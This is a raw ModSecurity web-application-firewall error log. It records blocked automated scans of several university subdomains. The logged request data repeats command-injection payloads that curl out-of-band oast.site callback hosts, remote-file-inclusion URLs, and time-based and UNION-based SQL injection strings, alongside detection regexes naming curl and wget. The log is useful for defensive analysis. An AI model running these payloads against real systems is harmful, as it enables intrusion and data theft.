[Tue Aug 29 11:31:03.702668 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlg4nmn8gd64z3pk.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10h8Co-f0AAAP9HewAAAAW"]
[Tue Aug 29 11:31:03.776522 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlg3s8ggf5zehwwz.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10h8Co-f0AAAP9He0AAAAW"]
[Tue Aug 29 11:31:03.835213 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlg8kwb6nprskgwz.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10h8Co-f0AAAP4H9QAAAAI"]
[Tue Aug 29 11:31:03.877715 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10h8Co-f0AAAP9HfAAAAAW"]
[Tue Aug 29 11:31:03.909447 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlgg96kepqj1n6e7.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10h8Co-f0AAAP4H9cAAAAI"]
[Tue Aug 29 11:31:04.497510 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlgyj51onz7aa9w4.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10iMCo-f0AAAP7dW4AAAAR"]
[Tue Aug 29 11:31:04.518806 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10iMCo-f0AAAP7dW8AAAAR"]
[Tue Aug 29 11:31:04.642541 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlg4z49qdeojzff4.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAP9HfIAAAAW"]
[Tue Aug 29 11:31:04.643991 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgxw4f477and9to.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlgxw4f477and9to.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAP7dXUAAAAR"]
[Tue Aug 29 11:31:04.664121 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgjuii5t6ph16ap.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlgjuii5t6ph16ap.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAP7dXYAAAAR"]
[Tue Aug 29 11:31:04.666111 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlga3bfq69i1x5ig.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlga3bfq69i1x5ig.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAP9HfMAAAAW"]
[Tue Aug 29 11:31:04.704286 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg97cgmg95ej6pb.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlg97cgmg95ej6pb.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAP7dXgAAAAR"]
[Tue Aug 29 11:31:04.708546 2023] [:error] [pid 1026] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg6swuzroqhwn1n.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlg6swuzroqhwn1n.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAQCvywAAAAk"]
[Tue Aug 29 11:31:04.713721 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlggjsiimqxi9d7i.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlggjsiimqxi9d7i.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAQEGE0AAAAm"]
[Tue Aug 29 11:31:04.727436 2023] [:error] [pid 1025] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlgy78cwp7xtycqd.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAQBUFYAAAAj"]
[Tue Aug 29 11:31:04.730988 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlgaxowxscixfjgt.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAQDFQsAAAAl"]
[Tue Aug 29 11:31:04.748296 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlgx9sk3qynsrf19.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAP7dXoAAAAR"]
[Tue Aug 29 11:31:04.751370 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlgtir3kt6yans59.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAQA-6IAAAAi"]
[Tue Aug 29 11:31:04.754784 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlgw45yp8tsw98yu.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAP4H@EAAAAI"]
[Tue Aug 29 11:31:05.000212 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10iMCo-f0AAAP7dX0AAAAR"]
[Tue Aug 29 11:31:05.000364 2023] [:error] [pid 1023] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10iMCo-f0AAAP-LMkAAAAe"]
[Tue Aug 29 11:31:05.020165 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10icCo-f0AAAP9HfsAAAAW"]
[Tue Aug 29 11:31:05.021060 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10icCo-f0AAAP7dX4AAAAR"]
[Tue Aug 29 11:31:05.021919 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10icCo-f0AAAQEGFIAAAAm"]
[Tue Aug 29 11:31:05.044126 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10icCo-f0AAAP@MvwAAAAZ"]
[Tue Aug 29 11:31:05.722986 2023] [:error] [pid 1031] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQHAj0AAAAp"]
[Tue Aug 29 11:31:05.739153 2023] [:error] [pid 1035] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "pusatbahasa.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQLC@gAAAAt"]
[Tue Aug 29 11:31:05.739642 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "informatika.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQOvy8AAAAw"]
